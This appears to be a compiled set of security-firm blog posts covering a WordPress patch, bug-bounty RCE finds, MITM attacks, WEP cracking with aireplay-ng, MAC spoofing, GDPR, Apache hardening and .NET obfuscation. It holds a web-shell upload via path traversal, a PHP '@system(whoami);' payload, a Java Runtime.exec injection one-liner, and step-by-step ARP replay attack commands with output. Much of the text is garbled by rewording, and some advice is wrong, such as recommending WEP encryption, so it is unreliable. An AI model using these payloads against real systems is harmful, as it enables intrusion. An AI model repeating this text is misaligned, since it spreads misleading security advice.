Airzero Sec

We Do Not Give Up ! Trust US !

Website Security

Website Security

The most recent WordPress security update corrects a number of issues. WordPress's developers have released a security-focused update that fixes four major security problems in the content management system. WordPress 5.8.3 explicitly addresses cross-site scripting (XSS) and SQL injection vulnerabilities in WordPress versions 3.7 to 5.8. The first is a fix for a stored XSS through post slugs vulnerability found by SonarSource's Karim El Ouerghemmi and Simon Scannell. "We uncovered and reported a stored XSS vulnerability in WordPress that might allow an authenticated attacker to inject a JavaScript payload into post slugs," El Ouerghemmi told The Daily Swig. Bugs such as XSS and SQL injection.

"After infecting the administrative dashboard, this payload might be used to steal administrator accounts and undermine the installation." "We disclosed the issue more than three years ago, and we're delighted to see it's been addressed," El Ouerghemmi continued. Next Tuesday, SonarSource aims to publish the technical specifics of this vulnerability in a blog post, along with information on how it may have been exploited without requiring any user credentials if an older version of the widely used plugin is installed. Separately, Simon Scannell of SonarSource identified a problem with "object injection in some multi-site deployments," which was also fixed with the WordPress 5.8.3 release.

The same version addresses a SQL injection vulnerability in WP_Query found by GiaoHangTietKiem JSC's ngocnb and khuyenn and reported through Trend Micro's Zero Day Imitative (ZDI) program.

The ZDI was contacted for comment by the Daily Swig. We haven't heard anything yet, but we'll keep you updated as more information becomes available. WordPress 5.8.3 is a security-focused interim version that doesn't include any new features or functionality.

Airzero Sec is at the forefront of security innovation, assisting you in overcoming the toughest security difficulties. Please contact us if you have any queries about the recent WordPress security update that resolves XSS and SQL injection issues.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Particularly when I speak with newbie protection researchers/bug bounty hunters, they perpetually make me think as not thinking themselves able of finding remote code execution vulnerabilities because they are super-complicated. Because of this error, these people are really not trying to attain any of them or stop looking back sometimes. I think maybe the rationalization after it is that most of the parts/write-ups are indeed super difficult bugs beginning with the RCE from various different root causes with connecting one to another. While I am continuously impressed by these well-written write-ups & innovative ways of exploitation, I still maintain to look for the loose ones too when running. Due to this, I decided to share some of the real-world examples that I found on the synack targets for a while, which were especially low-suspended fruits and could be improved/exploited by anyone. Just a few various tricks may really exploit a vulnerability that seems not exploitable at first.

Unrestricted File Upload 1:

On a host practice, I was looking at attaining a login page under /support/ directory within fuzzing directories. With the guidance of the javascript files stored on that login page, I mentioned some of the after-login endpoints and within direct entering this endpoint, I discovered that any of the administrator pages are available without login. One was to add an upload file page, which was allowing asp file lengths too. Sounds very easy right? Well, after upload, I tried to identify the upload record of the files within both fuzzing and from javascript files but it was not feasible. After that, I tried to upload the file to the upper registers within trying directory traversal vulnerability on the file name and it worked. Used “Fuzzing-Path Traversal” dictionary for a comfortable & electronic attack to find the vulnerability. But please be warned that while it doesn’t handle any query on file collection, it could be a query on file creation/update/deletion functionalities since all moving payloads will generate a new file on the server.

Unrestricted File Upload 2:

On a web system I was testing, I obtained a web form that did not exist on the web application site map or UI at all with the help of Google Dorks such as hunting site:domain.com ext: asp. That web form also had a file upload share, which was according to upload asp sizes. At this time, the test was also for obtaining the record of the upload was too. Nothing I did, I couldn’t identify the upload record and also didn’t find any vulnerability to chain with such as index traversal as on the first example. After that, I went back to the webform which I was packing. It was an appeal form for something I do not get. I filled the large form and post it. After a few times, I got an email from the web application about my request. That email included all the data I filled out to the form, including a link to my uploaded document which was at the corresponding application in-scope. Clicking the link delivered my same web shell as on the first example, as well as with the almost 3k payout from the platform.

Known RCE Exploitation:

On host testing, I obtained a version of SugarCRM app running on an in-scope IP address. Within the school version of the software & hunting for vulnerabilities on Google for it, I quickly discovered that the version was exposed for a PHP Code Execution vulnerability. Well, while the deed was executed, the assembly was not designed. I decided to use other msf payloads from the structure but none of them went, probably a firewall was checking both incoming and accommodating requests for bind shells. After that, I started the achievement code and analyzed it. Utilize code was generating a randomly named file under /custom/ directory and after that structure, a reversed shell to the presented IP address from that generated PHP file. When I quickly reached the file generated on my exploitation efforts it returned an empty response, meaning that the file was actually generated & the exploit worked.

After that, on the below code, I noticed that a special payload header is sent to the server from this file for full exploitation which is base64 encoded, via this code:

To encode the payload as @system(whoami); for:

  • system command from PHP for running OS command.
  • whoami os command for rendering the result.

Demanding the file generated by Metasploit with the payload header as performed turned the output of the whoami command, along with the around 3k payout again. When I was attempting to delete my planned web shells for the clean-up process on this.

Application Level Command Injection:

This one is a little more complex than the other examples but still needed to reply to this post because the exploitation system is different. On a confirmed web application testing, there was a functionality existing for attaching custom expressions to the problems generated by users Since the size was .do, the underlying technology was Java and I believed that maybe on the input script stage, they are also making Java functionalities as well as custom-designed functions?

Iappended the Java one-liner new java.io.DataInputStream(java.lang.Runtime.getRuntime(). exec("whoami").getInputStream()).readLine() under the custom created addMessage function for returning me to the output of the code and I saved the expression.

If you have any doubt about the above topic don’t hesitate to contact us. Airzero Sec will be your digital partner. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What is a MITM attack?

Man-in-the-middle attacks are a common type of cyber threat that enables attackers to listen to the communication between two points. The attack takes place within two legitimately corresponding hosts, leaving the attacker to “listen” to a discussion they should usually not be ready to listen to, hence the name “man-in-the-middle.

What are the types of MITM attacks?

Rogue Access Point :

Machines provided with broadcast cards will often try to auto-connect to the access point that is transmitting the most important signal. Criminals can set up their own wireless entrance point and deceive nearby plans to join its domain. All of the victim’s network traffic can now be controlled by the attacker. This is critical because the attacker does not also have to be on a dedicated network to do this—the attacker simply needs a close enough physical proximity.

ARP Spoofing

ARP is the Address Resolution Protocol. It is used to determine IP addresses to physical MAC addresses in a local area network. When a host requires to talk to a host with a given IP address, it references the ARP cache to determine the IP address to a MAC address. If the address is not recognized, a question is made asking for the MAC address of the machine with the IP address.

An attacker wanting to pose as another host could return to requests it should not be returning to with its own MAC address. With some definitely placed packets, an attacker can sniff the private traffic between two hosts. Valuable knowledge can be extracted from the traffic, such as the replacement of session tokens, allowing full access to application accounts that the attacker should not be able to access.

mDNS Spoofing

Multicast DNS is related to DNS, but it’s done on a local area network using broadcasts like ARP. This gives it a certain point for spoofing attacks. The local name resolution system is thought to make the configuration of network devices remarkably simple. Users don’t have to know precisely which addresses their agents should be interacting with they let the system choose it for them. Devices such as TVs, printers, and production systems take advantage of this protocol since they are typically on trusted networks. When an app requires to know the address of a certain device, such as tv. locally, an attacker can quickly respond to that request with fake data, telling it to resolve to an address it has control over. Since things have a local cache of addresses, the victim will now see the attacker’s device as trusted for a duration of time.

DNS Spoofing

Related to the way ARP resolves IP addresses to MAC addresses on a LAN, DNS resolves domain names to IP addresses. When using a DNS spoofing attack, the criminal attempts to open corrupt DNS cache data to a host in an effort to access another host using their domain name, such as www.onlinebanking.com. This points to the victim sending delicate data to a malicious host, with the hope they are sending information to a trusted source. An attacker who has previously tricked an IP address could have a much more comfortable time duping DNS solely by resolving the address of a DNS server to the attacker’s address.

What is the MITM attack technique?

Sniffing

Attackers use packet recovery tools to inspect packets at a deep level. Using specific broadcast machines that are allowed to be put into monitoring or mixed-mode can allow an intruder to see containers that are not selected for it to see, such as packets addressed to other hosts.

Packet Injection

An attacker can also leverage their equipment monitoring mode to inject malicious packets into data message streams. The packets can combine with valid data communication streams, resembling to be part of the communication, but wicked in nature. Packet injection normally includes first smelling to determine how and when to craft and send packets.

Session Hijacking

Most web applications use a login mechanism that generates a temporary session token to use for future requests to avoid requiring the user to type a password at every page. An attacker can sniff sensitive traffic to identify the session token for a user and use it to make requests as the user. The attacker does not need to spoof once he has a session token.

SSL Stripping

Since using HTTPS is an actual safeguard against ARP or DNS spoofing, attackers use SSL stripping to prevent packets and alter their HTTPS-based address applications to go to their HTTP equivalent endpoint, requiring the host to secure requests to the server unencrypted. Sensitive details can be leaked in plain text.

How to detect a man in the middle attack?

Catching a Man-in-the-middle attack can be hard without taking the individual steps. If you aren't actively examining to determine if your messages have been prevented, a Man-in-the-middle attack can probably go ignored until it's too late. Monitoring for proper page authentication and completing some sort of tamper illness are typically the key systems to detect a probable attack, but these ideas might require extra forensic analysis after the fact. It's important to take careful measures to stop MITM attacks before they occur, rather than striving to detect them while they are actively happening. Being aware of your browsing disciplines and identifying possibly harmful areas can be crucial to keeping a strong network. Below, we have involved five of the best practices to prevent MITM attacks from compromising your communications.

What are the practices to prevent man-in-the-middle attacks?

Strong WEP/WAP Encryption on Access Points

Having a secure encryption mechanism on wireless access points blocks unwanted users from meeting your network just by being nearby. A vulnerable encryption mechanism can enable an enemy to make his way into a network and begin man-in-the-middle attacking. The stronger the encryption implementation, the safer.

Strong Router Login Credentials

It’s necessary to make sure your error router login is developed. Not just your Wi-Fi password, but your router login credentials. If a criminal gets your router login credentials, they can turn your DNS servers into their wicked servers. Or even worse, infect your router with malicious software.

Virtual Private Network

VPNs can be used to build a safe environment for sensitive data within a local area network. They use key-based encryption to produce a subnet for a secure connection. This way, even if an attacker appears to get on a system that is shared, he will not be able to decipher the traffic in the VPN.

Force HTTPS

HTTPS can be used to securely transfer over HTTP using a public-private key exchange. This limits an intruder from having any use of the information he may be sniffing. Websites should only use HTTPS and not give HTTP options. Users can install browser plugins to enforce always using HTTPS on requests.

Public Key Pair Based Authentication

Man-in-the-middle attacks typically include spoofing something or another. Public key pair-based authentication like RSA can be used in various layers of the stack to help ensure whether the questions you are interacting with are actually the things you want to be communicating with.

If you have any doubts about this topic or have to get advice and get the best services and consultation against MITM attacks. Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The best ARP request replay attack is the most suitable way to make new initialization vectors, and it runs very reliably. The program looks for an ARP packet then retransmits it back to the point that it accesses. This, in turn, causes the access point to continuously loop the ARP packet with the latest IV. The function retransmits the same ARP packet more and more. However, each packet repeated by the access point has the latest IVs. It is all these latest initialization vectors that make you determine the WEP key.

What is ARP?

ARP is address protocol: A TCP/IP protocol used to change an IP address into an external address, such as an Ethernet address. A host wishing to gain an external address broadcasts an ARP request onto the TCP/IP. The admin on the network that has the address in the request then replies with its physical hardware address.

What is the usage of ARP?

The basic usage is :

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where this was used:

  • 3 means classic arp request replay
  • -b 00:13:10:30:24:9C is the gain point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • ath0 is the wireless user interface name

The next usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r
replay_arp-0219-115508.cap ath0

Where is it used:

  • -3 means classic arp request replay
  • -b 00:13:10:30:24:9C is the point of MAC address
  • -h 00:11:22:33:44:55 is the gain point MAC address
  • -r replay_arp-0219-115508.cap is the name of the file from your last perfect ARP replay
  • ath0 is the wireless interface

The next usage is :

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where is it used:

  • 2 means interactive frame
  • -r replay_arp-0219-115508.cap is the name of the folder from your final successful ARP replay

What are the examples of the usage?

For all of the given examples, use airmon-ng to put your card in monitor mode first. You cannot inject packages unless it is in monitor mode.

For this type of attack, you need either the MAC address of a client , or a fake MAC address from the attack. The simplest and fastest way is to use the MAC address of a client. This can be obtained through airodump-ng. The reason for using a MAC address is that the gain point will only require and repeat packets where the sending MAC is “associated”.

You may need to wait for a couple of seconds, or even longer, until an ARP request pops up. This type of attack will fail if there is no traffic.

Enter below command:

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system will responds:

Saving ARP requests in replay_arp-0219-123051.cap

You should also start airodump-ng to hold the replies.

Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initially the last line will look same as the below command: Read 39 packets , sent 0 packets...

Then when this type of attack is in progress, the zeroes display the actual counts as in the full sample that is given above. You can also make sure of this by running airodump-ng to hold the IVs being created. It should show the data count increasing rapidly for the specific access point.

The second we will look at is reusing the captured ARP from the above example. You will show that it said the ARP requests were being used in “replay_arp-0219-123051.cap”. So rather then waiting for a new ARP, we simply continue to use the old ones with the “-r” parameter:

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds like the below command:

Size: 86, FromDS: 0, ToDS: 1 (WEP)
BSSID  =  00:14:6C:7E:40:80
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:0F:B5:88:AC:82
0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
0x0050:  ca97 0d9e 4731                           ....G1
Use this packet ? y

You say “y” and then your device will create injecting:

Saving chosen packet in replay_src-0219-123117.cap

You should also start airodump-ng to hold the replies.

 Sent 3181 packets...

As well, you can continuously use per the Usage Section above:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

At this time, if you have not already done so, start airodump-ng to hold the IVs being generated. The data count should be increasing continuously.

When you are doing this at home, to create an ARP packet to start with the ARP injection, simply ping a non-existent IP on the network.

If you have any doubts about this topic or have to get advice and get the best services and consultation about ARP request replay attack . Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Changing MAC address or we also can tell that MAC address spoofing will be useful in some situations, but we will discuss it later in the conclusion of this blog.

The main requirement needed for this spoofing is a Linux terminal.

Steps needed to change mac address:

  • The first step is to Open your terminal, and enter

    ifconfig | grep HWaddr

  • To change your mac address temporarily, we need to switch off the network interface first by running the below command

    ifconfig eth0 down

  • he next step is that we can configure the new MAC address

    ifconfig eth0 hw ether 00:00:00:00:00:02

  • Next we can switch on the network interface again

    ifconfig eth0 up

  • And the last step we can check again our MAC whether it's changed or not. Go to the next page to display how to change MAC addresses permanently.

  • Kali Linux was made based on Debian. In Debian all the network interfaces were located on

    /etc/network/interfaces

  • We will merge the /etc/network/interfaces. In this blog I will use a pico text editor, but you can select any of the text editors.

    pico /etc/network/interfaces

  • Now we will include one line of script to change our MAC address forever

    pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

  • If we want to store again the default MAC address, just add the # sign in front of command in the above step.

    #pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

What is the conclusion:

Changing MAC addresses is basically required for privacy and to prevent tracking in the local network about your hardware details. Some network administrators make blocking rights in proxy and router by including the MAC address. To ensure interoperability and prevent being removed by the proxy and router blacklist rule, we can atlast change our MAC address.

If you have any questions about this topic or have to get advice and get the best services and consultation against cyber problems. Feel free to contact us. AIRZERO SEC will be your strong firewall. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The number of people with cybersecurity skills is rising, and more than ever, organizations are in need of security professionals to protect their networks and devices. So whether you’re just a beginner in cybersecurity or you’re established as a professional, you constantly need to work on practicing and needle your hacking skills.

Penetration testing, also known as a pen test, pentest, and ethical hacking, is an authorized simulated cyber attack on a computer device, acted to evaluate the safety of the system. This is not to be confused with a vulnerability checker. The test is performed to find weaknesses, including the potential for unwanted parties to gain access to the device’s features and data, as well as power, enabling a full risk assessment to be completed.

The main websites are:

  • Hack the box
  • CTFlearn
  • bWAPP
  • Hack this site
  • Google Gruyere
  • Try2hack
  • WebGoat
  • RootMe

What about Hack the box?

Hack The Box is a massive, online cyber safety training platform, allowing persons, organizations, universities, and all types of organizations around the world to level up their hacking abilities. Hack The Box is the world's greatest hacking community where you study and track your progress. You also get invitations to hack websites applying your hacking style.

What about CTFlearn?

CTFlearn is another largely popular ethical hacking platform. Offered as “The most beginner-useful way to get into hacking”, CTF learn boasts a worldwide following of over 70,000 people who are there to study, practice and compete.

The platform’s name derives from Capture The Flag , which is popular in the hacking platform for its contents and reputation as a favorite cybersecurity big challenge for beginners as well as professional attackers. CTFlearn also features challenges and competitions that give the users the skill to act as both attacker and defender.

What about bWAPP?

bWAPP is an open-source deliberately unsafe application. It helps safety enthusiasts, programmers, and students to discover and to prevent web weaknesses. bWAPP prepares one to conduct successful penetration testing and more projects. Well, it has over web weaknesses It covers all major known bugs. It can also be enabled with WAMP and XAMPP. Another possibility is to install the bee-box, a personalized Linux VM pre-enabled with bWAPP.

What about hack the site?

This is a free, secure, and legal training platform for hackers to test and expand their ethical hacking abilities with challenges, and more. They are greater than just another hacker wargames site. They have a community devoted to studying and sharing ethical hacking knowledge, technical passions, programming expertise, with many active plans in development. It gives numerous different challenges that contain starter as well as advanced hacking abilities. The challenges are enjoyable and engaging, with real-life cases and different behaviors. Each challenge has a thread on a forum where you can plan it with other members of the community and offer resources to solve the puzzle faster

What about Google gruyere?

Gruyere has a variety of security bugs ranging from cross-site programming and cross-site request forgery to details disclosure, denial of service, and remote code running. The target of this test code lab is to guide you through identifying some of these bugs and studying ways to fix them both in Gruyere and in basic.

What about try2hack?

This website provides several safety-oriented challenges for your fun. It is actually one of the greatest challenge sites still around.

What about WebGoat?

WebGoat is a deliberately unsafe app that makes interested programmers just like you to test weaknesses found in Java-based apps that use common and greater open source components. Web application security is difficult to learn and exercise. Not many individuals have full-blown web apps like internet book stores or online banks that can be used to scan for weaknesses. Security professionals frequently need to test options against a platform known to be weaknesses to ensure that they act as advertised. All of this is required to happen in a secure and legal ecosystem.

What about RootMe?

RootMe offers a simple, speedy, and affordable platform to study your hacking ability. It is an easy-to-use website, you just have to put a digital signature into the website, and you are perfect to go. With just a few selections, you will access different virtual environments.

If you have any doubts about this topic or have to get advice and get the best services and consultation against cyberthreats. Feel free to contact us. AIRZERO SEC will be your strong firewall. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The General Data Protection Regulation is a legal framework that sets rules for the collection and processing of personal information from persons who live in the European Union. Since the Rules applies regardless of where websites have stayed, it must be heeded by all websites that attract European visitors, even if they don't specifically market goods to European Union residents.

The GDPR mandates that European Union visitors be given a number of data. The website must also take points to facilitate such European Union consumer rights as a timely notification in the event of private data being breached. That was in April 2016, the Regulation came into complete effect in May 2018, after a two-year transition period.

What are the Customer-Service Requirements of the GDPR?

Under the instructions, visitors must be told of data the site collects from them and explicitly consent to that details-gathering, by selecting on an Agree button or other action. Websites must also communicate with users in a timely way if any of their private data held by the site is breached. These European Union needs may be more stringent than those needed in the jurisdiction in which the website is placed.

Also mandated is an effort of the site's data security, and whether a dedicated data protection officer needs to be hired to carry out this function.

Information on how to contact the Data Protection Officer and other important staffers must be accessible so that visitors may exercise their European Union data rights, which also include the skill to have their presence on the site disappear, among other measures.

Does GDPR Apply to US Companies?

The GDPR applies to US businesses, regardless of their size in terms of revenue or staff, whether any of the below conditions are satisfying

  • The company offers goods to EU and EEA residents.
  • The company monitors the character of users inside the EU andEEA

Private data and behavior covered by the GDPR include names, contact details, device information, biometric information, photographs, and more.

GDPR compliance needs vary depending on the behavior of the company. For the moment, businesses with fewer than 250 employees do not need to maintain a record. However, this instruction applies only if the processing is not likely to pose a risk to the rights and freedoms of the data subjects if no special categories of data are processed.

Does GDPR Apply to US Citizens?

Depending on where they are situated, the GDPR can and also apply to US citizens.

The GDPR uses the term data subject to refer to the person whose data is being processed. Per most interfaces of the GDPR, whether the GDPR applies is dependent on where the data subject is when their data is processed, and not the citizenship of the data record.

Does GDPR Apply to the US Government?

The GDPR does not make blanket exceptions to governmental agencies. Therefore, if the US government targets or processes the private data of EU and EEA-based users, it will be expected to comply with the GDPR. This is true for all non-EU and EEA public agencies. The GDPR does afford a few non-border to member states of the EU and EEA.

One such exemption is that government agencies are excused from complying with certain conditions of the GDPR so long as private data is processed in public interest, such as for preventing and prosecuting criminal offenses or threats to public safety.

GDPR Requirements for US Companies

In the event that a US company is expected to fulfill the GDPR, it is wished to meet the same strict needs that companies situated in the EU are expected to meet.

The text of the GDPR is quite extensive, and ensuring compliance can be worrying. For organizations that must comply with the GDPR, the following are the key needs and features:

  1. Data Breach Notifications
  2. Data Protection Impact Assessments
  3. Privacy by Design
  4. Strict Consent Conditions
  5. Data Subject Access Requests
  6. Appointing a Data Protection Officer

GDPR Enforcement in the US

In Europe, power of the GDPR is located with the numerous supervisory authorities in the EEA and Switzerland. There are several mechanisms through which the GDPR can be powered in the US.

  1. If the company has a presence or assets in the EU and EEA, they can be seized for GDPR noncompliance.
  2. For companies without a physical presence in the EU and EEA, the GDPR mandates the appointment of a leadered who is physically located within the EU and EEA. In cases of GDPR noncompliance, this person would be a likely channel through which fines are levied.
  3. International law is another channel through which legal action can be taken. Given that it is mutually beneficial for national enforcement agencies to support each other, punitive actions may be pursued by the EU and EEA enforcement agencies. These agencies are likely to be assisted by public organizations in the country where the company is registered.

To sum up, especially for multinational companies, noncompliance will be pursued aggressively by the EU and EEA enforcement agencies.

GDPR Fines for US Companies

The national enforcement agencies of various EU and EEA countries have the legal means to enforce noncompliance fines and penalties on companies located outside of their territory.

Conclusion

Whether the GDPR applies is dependent on where the data subject is when their data is processed, and not the citizenship or nationality of the data subject. Any US company that serves customers in the EU and EEA — or tracks their character within this region — must fully comply with the GDPR.

If you have any questions about the above topic or have to get services and consultations against every serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Before we enter into the mentioned topic, first we have to know about some common topics like installation of apache and some basic concepts so let’s start with the installation.

How to install apache on ubuntu?

This section will help you to install an apache web server on the Ubuntu operating system.

Before beginning your work:

  • Running Ubuntu system with privileges shell access
  • Complete initial instructions for server setup
  • Needed a domain name registered and pointed to your server’s public IP address

Step 1 — Installing Apache

Apache is available under the default software repositories on Ubuntu. You can simply install it using the conventional package management tool. Firstly, update the local package to reflect the latest upstream changes. Then install Apache webserver. After the confirmation you are given, apt will install Apache and other required and essential things on your system.

Step 2 — Test Your Web Server

After the installation is finished, the Apache service will automatically start on your system. You can find the Apache status by running the following command:

$ sudo systemctl status apache

After running the command prompt. The status like “Active: active (running)” means Apache service has started right. However, the best way to test a web server, request a page from Apache in a web browser. You will see the Apache landing page while you test in the web browser. It means the Apache web server is running correctly on your system.

OK! Next, we need to know how to secure apache in Ubuntu. Ok follow this article, there will be some tips to strengthen your security in the apache web server.

Tips To Strengthen Your Apache Web Server Security:

  • Make an apache version and os identity from errors
  • Disable directory listing
  • Keep updating Apache regularly
  • Disable unnecessary modules
  • Run apache as a separate user and group
  • Use allow and deny to restrict access to directories

How To Make Apache Version And Os Identity From Errors?

When you download Apache with other package installers like yum, it displays what version is your Apache web server installed on your server with the Operating system name of your server in Errors. It also shows the details about Apache modules installed on your server.

Now you can see that Apache is showing what version it is with Ubuntu installed in your server. This can be a major security problem to your web server as well as your Linux box too. To protect Apache from displaying this information to the world, we need to make some changes in Apache’s main configuration file.

Open the configuration file and search for “ServerSignature“, it’s by default it will be On. So next we need to Off these server signatures and the second line “ServerTokens Prod” tells Apache to return only Apache as a thing in the server response header on every page request, It suppresses the Ubuntu, major, and minor version info.

How to disable directory listing?

By default, Apache lists the content of the document root directory in the absence of an index file. We can turn off directory listing by using the Options directive in the configuration file for a specific directory. For that, we need to make a way in httpd. Conf file...

How To Keep Updating Apache Regularly?

Apache developers are continuously working on security problems and releasing their updated version with a variety of security options. So It is always recommended to use the new version of Apache as your web server.

To check which Apache version you used: You can check your current version with httpd -v command.

How To Disable Unnecessary Modules?

It’s always good to reduce the chances of being a victim of any cyber attack. So it’s recommended to remove all those modules that are not in use often. You can list all the compiled modules of the webserver, using the following command.

# grep LoadModule /etc/httpd/conf/httpd.conf

# have to place corresponding `LoadModule' lines at this location so the

# LoadModule foo_module modules/mod_foo.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_alias_module modules/mod_authn_alias.so
LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule ldap_module modules/mod_ldap.so
LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule logio_module modules/mod_logio.so
LoadModule env_module modules/mod_env.so
LoadModule ext_filter_module modules/mod_ext_filter.so

Above is the list that is removed by default but often not needed: mod_imap, mod_include, mod_info, mod_userdir, mod_autoindex. To disable this module, you can insert a “#” at the beginning of that line and restart the server service.

How To Run Apache As A Separate User And Group?

With an automatic installation, Apache builds its process with user nobody or daemon. For security reasons, it is suggested to run Apache in its own non-privileged account. For example: HTTP-web.

Create Apache User and Group

# groupadd http-web
# useradd -d /var/www/ -g http-web -s /bin/nologin http-web

Now you want to tell Apache to run with this user and to do so, we need to make a way in /etc/httpd/conf/httpd.conf and restart the server service.

Open /etc/httpd/conf/httpd.conf with the editor and search for keywords “User” and “Group” and there you will want to specify the username and group name to use.

User HTTP-web
Group HTTP-web

How to use allow and deny to restrict access to directories?

So we can restrict the access to directories with “Allow” and “Deny” options in httpd.conf file. Here in the below example, we’ll be safeguarding the root directory, for that by setting the following in the httpd.conf file.

<Directory />
Options None
Order deny,allow
Deny from all
</Directory>
  • Options “None” – not allow users to enable any optional features.
  • Order deny, allow – Used to “Deny” and “Allow” directives will be processed. Here it will first “deny” and next “allow”.
  • Deny from all – deny the request from everybody to the root directory, nobody will be able to access the root directory.

The best cyber security consulting company will provide you with the cyber security provided solutions for your system to be a partner of the best cyber security service provider.

If you have any queries about this topic or have to get cybersecurity services and consultations against these serious cyber attacks. Feel free to contact us. AIRZERO SEC will always be your strong firewall. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Many developers and programmers are still not aware that Portable Executable files can be decompiled into readable source code. Before going to the topic of what we do to stop or make it hard for the decompilers to reverse engineer the source code, we need to understand some basic concepts. A Cybersecurity consulting company can help you to provide the best-secured way to avoid decompilation for your application.

Is C# easy to decompile?

C# is easy to decompile because it contains metadata that can aid in decompilation. C# also compiles down to an intermediate language which maps much better to the exact source code. so it is easy to decompile. C# compiles to CIL. Typically, a lot more information about the exact source code, such as object-oriented concepts including class structure, can be gleaned from reading the CIL than from reading.

How to prevent decompilation against C# applications?

One way to make the C# application a little more difficult to crack would be to deliver it as a program that decrypts its instructions, compiles and runs them only when needed. This way, if someone finds out where the exact code is stored, it will still be encrypted and without a license it is unusable.

What is a Portable Executable file?

When source code is compiled, it generates a Portable Executable file. Portable Executable is either a DLL or an EXE. Portable executable file contains Microsoft Intermediate Language and Metadata. Microsoft intermediate language is ultimately converted by CLR into the native code which a processor can understand. Metadata contains assembly information like Assembly Name, what the Version is, Culture and the Public Key. Consult a cyber security solution that makes your application safe and portable.

How Can We Get Source Code from EXE?

Yes, you heard right we can get the source code from DLL or EXE. To show this, let's create a simple app first.

Steps to develop an application is:

  • Open Visual Studio
  • create a new project
  • select console-based application
  • Add some code to the newly created project

For example, start with the sample code below:

using System;
namespace MyConsoleApp {
internal class Program{

private static void Main(string[] args){
Console.WriteLine(PublicMethod());
Console.WriteLine(PrivateMethod());}

 public static string PublicMethod(){

// Your source code here
return "Public Method";}
private static string PrivateMethod(){

// Your source code here return "Private Method";}}}

OK! After that now builds the application, an EXE will be generated in the folder bin/debug. Now let's try to get the code from the EXE file:

  • open Visual Studio command prompt.
  • Type ildasm and hit enter( ILDASM basically has an ability to read intermediate language).
  • open the EXE file that was created.

As we can see, ILDASM disassembles the EXE and lots of useful information can be stored, though it does not provide the original code completely, a lot can be changed. The easy way to reverse engineer and get the exact code is that there are decompilers available and used for free, which can convert the Intermediate Language into the original source code.

When we open the EXE with a decompiler we are able to see the original code. This can lead to piracy and you can lose your profits.

How to Prevent EXE from Getting Decompiled?

The process of protecting the EXE and DLL from getting decompiled into the exact code is called Obfuscation. There is a lot of software available to Obfuscate the .NET assemblies. The below settings are related to confuserex.

  • Download obfuscate software that is available online.
  • Extract the zip and then run
  • Select the EXE you want to protect.
  • Once you are done makeup the directories and adding EXE, go to the Settings tab.
  • Click on the button “+”, you will see “true” under Rules
  • Click on the edit rule
  • A new window will appear
  • Click on the “+” button
  • You can choose different ways to add levels of protection
  • Select only with “Anti IL Dasm” and “Anti Tamper”(this is enough to make things hard to reverse engineer for decompilers).
  • Click on Done
  • Go to Protect tab
  • Click on Protect button
  • You can find the protected EXE in the output directory selected

ALL SET! Now you see your EXE cannot be decompiled anymore.

If you have any queries about this topic or have to get cybersecurity services and consultations against these serious cyber attacks. Feel free to contact us. AIRZERO SEC will always be your strong firewall. E-mail id: [email protected]

